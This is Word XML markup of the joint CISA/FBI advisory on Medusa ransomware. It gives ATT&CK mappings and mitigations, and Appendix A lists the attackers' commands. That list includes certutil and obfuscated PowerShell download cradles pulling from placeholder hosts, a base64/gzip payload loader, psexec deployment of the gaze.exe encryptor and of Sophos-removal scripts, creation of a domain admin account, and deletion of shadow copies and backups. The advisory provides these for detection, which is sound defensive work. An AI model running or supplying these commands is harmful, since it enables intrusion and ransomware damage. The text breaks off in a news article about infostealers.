        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Indicator Removal T1070 Medusa actors deleted their previous work and tools installed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Impair Defenses: Disable or Modify Tools T1562.001 Medusa actors killed or deleted endpoint detection and response tools.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5: Discovery Technique Title ID Use Network Service Discovery T1046 Medusa actors utilized living of the land techniques to perform network enumeration.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>File and Directory Discovery T1083 Medusa actors utilized Windows Command Prompt for filesystem enumeration.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Network Share Discovery T1135 Medusa actors queried shared drives on the local system to gather sources of information.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>System Network Configuration Discovery T1016 Medusa actors used operating system administrative utilities to gather network information.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>System Information Discovery T1082 Medusa actors used the command systeminfo to gather detailed system information.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Permission Groups Discovery: Domain Groups T1069.002 Medusa actors attempt to find domain-level group and permission settings.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6: Credential Access Technique Title ID Use Credential Access TA0006 Medusa actors harvest credentials with tools like Mimikatz to gain access to systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>OS Credential Dumping: LSASS Memory T1003.001 Medusa actors were observed accessing credential material stored in process memory or Local Security Authority Subsystem Service (LSASS) using Mimkatz.</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7: Lateral Movement and Execution Technique Title ID Use Lateral Movement TA0008 Medusa actors performed techniques to move laterally without detection once they gained initial access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Command and Scripting Interpreter: PowerShell T1059.001 Medusa actors used PowerShell, a powerful interactive command-line interface and scripting environment for ingress, network, and filesystem enumeration.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Command and Scripting Interpreter: Windows Command Shell T1059.003 Medusa actors used Windows Command Prompt-which can be used to control almost any aspect of a system-for ingress, network, and filesystem enumeration. Software Deployment Tools T1072 Medusa Actors used PDQ Deploy and BigFix to deploy the encryptor on files across the network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Remote Services: Remote Desktop Protocol T1021.001 Medusa actors used Remote Desktop Protocol (RDP), a common feature in operating systems, to log into an interactive session with a system and move laterally.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>System Services T1569.002 Medusa actors used Sysinternals PsExec to deploy the encryptor on files across the network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Windows Management Instrumentation T1047 Medusa actors abused Windows Management Instrumentation to query system information.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8: Exfiltration and Encryption Technique Title ID Use Exfiltration TA0010 Medusa actors identified files to exfiltrate out of victim networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 Medusa actors used Rclone to facilitate exfiltration of data to the Medusa C2 servers.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9: Command and Control Technique Title ID Use Ingress Tool Transfer T1105 Medusa actors used PowerShell, Windows Command Prompt, and certutil for file ingress.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Application Layer Protocol: Web Protocols T1071.001 Medusa actors communicate using application layer protocols associated with web traffic. In this case, Medusa actors used scripts that created reverse or bind shells over port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>443: HTTPS.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Remote Access Software T1219 Medusa actors used remote access software to move laterally through the network.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10: Persistence Technique Title ID Use Create Account T1136.002 Medusa actors created a domain account to maintain access to victim systems.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11: Impact Technique Title ID Use Data Encrypted for Impact T1486 Medusa identified and encrypted data on target systems to interrupt availability to system and network resources. Inhibit System Recovery T1490 The process gaze.exe terminates all services then deletes shadow copies and encrypts files with AES-256 before dropping the ransom note.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Financial Theft T1657 Victims must pay to decrypt files and prevent further release by Medusa actors.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>System Shutdown/Reboot T1529 Medusa actors manually turned off and encrypted virtual machines.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Service Stop T1489 The process gaze.exe terminates all services related to backups, security, databases, communication, file sharing, and websites, Mitigations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FBI, CISA, and MS-ISAC recommend organizations implement the mitigations below to improve cybersecurity posture based on threat actors' activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA's CPGs webpage for more information on the CPGs, including additional recommended baseline protections. Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [CPG 2.F, 2.R, 2.S].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST's standards. In particular, require employees to use long passwords and consider not requiring frequently recurring password changes, as these can weaken security [CPG 2.C].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Require multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [CPG 2.H].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between-and access to-various subnetworks and by restricting adversary lateral movement [CPG 2.F].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Require VPNs or Jump Hosts for remote access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Monitor for unauthorized scanning and access attempts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents threat actors from directly connecting to remote access services that they have established for persistence.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 1.A, 2.O].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.E, 2.N].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable unused ports[CPG 2.V].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Maintain offline backups of data, and regularly maintain backup and restoration [CPG 2.R]. By instituting this practice, the organization helps ensure they will not be severely interrupted and/or only have irretrievable data. Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization's data infrastructure [CPG 2.K, 2.L, 2.R]. Validate Security Controls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addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK Matrix for Enterprise framework in this advisory. The FBI, CISA, and MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.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 get started: Select an ATT&amp;CK technique described in this advisory (Table 3 to Table 11). Align your security technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test your technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Analyze your detection and prevention technologies' performance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Tune your security program, including people, processes, and technologies, based on the data generated by this process.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FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory. Resources Joint #StopRansomware Guide.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Joint Guide Identifying and Mitigating Living Off the Land Techniques. Joint Guide to Securing Remote Access Software. Reporting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Your organization has no obligation to respond or provide information back to FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.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FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.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Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.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FBI, CISA, and MS-ISAC do not encourage paying ransoms as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI, CISA, and MS-ISAC urge you to promptly report ransomware incidents to FBI's Internet Crime Complaint Center (IC3), a local FBI Field Office, or CISA via the agency's Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844- Say-CISA (1-844-729-2472). Disclaimer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information in this report is being provided "as is" for informational purposes only. The FBI, CISA, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, and MS-ISAC. Acknowledgements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ConnectWise contributed to this advisory. Version History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March 12, 2025: Initial version. Appendix A: Medusa Commands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These commands explicitly demonstrate the methods used by Medusa threat actors once they obtain a foothold inside a victim network. Incident responders and threat hunters can use this information to detect malicious activity. System administrators can use this information to design allowlist/denylist policies or other protective mechanisms.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>cmd.exe /c certutil -f urlcache https://&lt;domain&gt;/&lt;remotefile&gt;.css &lt;localfile&gt;.dll cmd.exe /c certutil -f urlcache https://&lt;domain&gt;/&lt;remotefile&gt;.msi &lt;localfile&gt;.msi cmd.exe /c driverquery cmd.exe /c echo Computer: %COMPUTERNAME% &amp; ` echo Username: %USERNAME% &amp; ` echo Domain: %USERDOMAIN% &amp; ` echo Logon Server: %LOGONSERVER% &amp; ` echo DNS Domain: %USERDNSDOMAIN% &amp; ` echo User Profile: %USERPROFILE% &amp; echo ` System Root: %SYSTEMROOT% cmd.exe /c ipconfig /all [T1016] cmd.exe /c net share [T1135] cmd.exe /c net use cmd.exe /c netstat -a cmd.exe /c sc query cmd.exe /c schtasks cmd.exe /c systeminfo [T1082] cmd.exe /c ver cmd.exe /c wmic printer get caption,name,deviceid,drivername,portname cmd.exe /c wmic printjob mmc.exe compmgmt.msc /computer:{hostname/ip} mstsc.exe /v:{hostname/ip} mstsc.exe /v:{hostname/ip} /u:{user} /p:{pass} powershell -exec bypass -enc &lt;base64 encrypted command string&gt; powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke- Expression (New-Object Net.WebClient).$x.Invoke(http://&lt;ip&gt;/&lt;RMM tool&gt;.msi)</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powershell -nop -w hidden -noni -ep bypass &amp;([scriptblock]::create((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New-Object System.IO.StreamReader(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New-Object System.IO.Compression.GzipStream((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New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(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(('&lt;base64 payload string&gt;')-f'&lt;character replacement 0&gt;',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'&lt;character replacement 1&gt;','&lt;character replacement 2&gt;')))),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[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) powershell Remove-Item (Get-PSReadlineOption).HistorySavePath</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powershell Get-ADComputer -Filter * -Property * | Select-Object Name,OperatingSystem,OperatingSystemVersion,Description,LastLogonDate,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logonCount,whenChanged,whenCreated,ipv4Address | Export-CSV -Path &lt;file path&gt;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-NoTypeInformation -Encoding UTF8 psexec.exe -accepteula -nobanner -s \\{hostname/ip} "c:\windows\system32\taskkill.exe" /f /im WRSA.exe psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c coba.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c openrdp.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c StopAllProcess.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c zam.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} c:\temp\x.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "c:\gaze.exe" psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "copy \\ad02\sysvol\gaze.exe c:\gaze.exe psexec.exe -accepteula -nobanner -s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>\\{hostname/ip} cmd /c "copy \\ad02\sysvol\gaze.exe c:\gaze.exe &amp;&amp; c:\gaze.exe" psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c coba.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c hostname/ipwho.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c openrdp.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c zam.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} cmd psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -с newuser.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с duooff.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с hostname/ipwho.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с newuser.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с removesophos.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с start.bat psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с uninstallSophos.bat nltest /dclist: net group "domain admins" /domain [T1069.002] net group "Domain Admins" default /add /domain net group "Enterprise Admins" default /add /domain net group "Remote Desktop Users" default /add /domain net group "Group Policy Creator Owners" default /add /domain net group "Schema Admins" default /add /domain net group "domain users" /domain net user default /active:yes /domain net user /add default &lt;password&gt; /domain [T1136.002] query user reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 systeminfo vssadmin.exe Delete Shadows /all /quiet vssadmin.exe resize shadowstorage /for=%s /on=%s /maxsize=unbounded del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf %sBac kup*.* %sbackup*.* %s*.set %s*.win %s*.dsk netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2025.03.12 20:50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Malware exposes 3.9 billion passwords in huge cybersecurity threat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Cybercrime actors are coming for your passwords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Kurt Knutsson, CyberGuy Report Fox News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Published February 26, 2025 10:00am EST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 saw a rise in infostealer malware in 2024, with hackers using it to steal credentials, cryptocurrency and other personal data from millions of users. If you recall, I reported countless incidents of an infostealer called Lumma preying on Android, Windows and even iOS and Mac users.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new cybersecurity report now highlights that hackers using Lumma, along with StealC, Redline and other infostealers, infected 4.3 million machines in 2024, leading to an astonishing 330 million compromised credentials.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Security researchers have also observed 3.9 billion credentials shared in credential lists that appear to be sourced from infostealer logs.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STAY PROTECTED &amp; INFORMED! GET SECURITY ALERTS &amp; EXPERT TECH TIPS - SIGN UP FOR KURT'S THE CYBERGUY REPORT NOW</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Infostealer-related attacks on the rise in 2024</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cybersecurity report by threat intelligence platform KELA has uncovered a sharp rise in infostealer malware in 2024. Researchers also observed an alarming trend in how stolen data was circulated. Large compilations of credentials, often referred to as "credential lists," were being shared across cybercrime forums. These lists, primarily sourced from infostealer logs, contained billions of login details harvested from infected devices.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One of the most notable incidents linked to infostealer malware was the breach of Snowflake, a cloud data storage provider. In April 2024, threat actors gained access to customer accounts using stolen login credentials, many of which were obtained through infostealers. Exploiting weak security practices, such as the absence of multifactor authentication, attackers extracted valuable data and later attempted to sell it on underground markets. The breach affected at least 165 companies.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IS ARTIFICIAL INTELLIGENCE (AI)?</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KELA report highlights that hackers deploying Lumma, StealC, Redline and other infostealers infected 4.3 million machines, leading to the compromise of 330 million credentials. Nearly 40% of these infected machines contained credentials for corporate systems, including content management platforms, email accounts, Active Directory Federation Services and remote desktop environments. In total, this accounted for 1.7 million compromised bots and 7.5 million stolen credentials.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report also found that 3.9 billion credentials were shared in credential lists that appear to be sourced from infostealer logs. KELA's analysis suggests that almost 65% of infected devices were personal computers storing corporate credentials, making them a prime target for infostealer malware.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REMOVE YOUR PRIVATE DATA FROM THE INTERNET 2025 is not going to be any different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Infostealer malware is not going anywhere in 2025. With malware-as-a- service platforms on the rise and infostealers becoming more advanced, cybercriminals will likely keep using them as a go-to method for stealing credentials and gaining access to systems.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Law enforcement has been cracking down, though. In 2024, authorities managed to take down key parts of the infostealer ecosystem, including disrupting Redline, one of the most widely used infostealers. This showed that international agencies can go after not just the malware developers but also the networks and underground markets that keep these operations running.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takedowns like these rarely put an end to the problem. When one major infostealer operation is shut down, others quickly step in to take its place. The constant demand for stolen credentials and the ability of cybercriminals to adapt means infostealer attacks will likely remain a major threat in 2025.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GET FOX BUSINESS ON THE GO BY CLICKING HERE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BEST ANTIVIRUS FOR MAC, PC, IPHONES AND ANDROIDS - CYBERGUY PICKSWays to stay safe from infostealer malware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infostealer malware becoming a growing threat, protecting your data requires a mix of smart security habits and reliable tools. Here are some effective ways to keep your information safe.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 Enable two-factor authentication (2FA): Even if your credentials are stolen, 2FA adds an extra layer of security by requiring a second form of verification, such as a code from an authentication app or biometric confirmation. Cybercriminals rely on stolen usernames and passwords to break into accounts, but with 2FA enabled, they cannot gain access without the additional security step. Make sure to enable 2FA on important accounts like email, banking and work-related logins.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 Use strong antivirus software and be cautious with downloads and links: Infostealer malware often spreads through malicious downloads, phishing emails and fake websites. Avoid downloading software or files from untrusted sources and always double-check links before clicking them. Attackers disguise malware as legitimate software, game cheats or cracked applications, so it is best to stick to official websites and app stores for downloads.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best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe. Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android and iOS devices.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 Use a password manager: Many infostealers target saved passwords in web browsers. Instead of relying on your browser to store credentials, use a dedicated password manager. Get 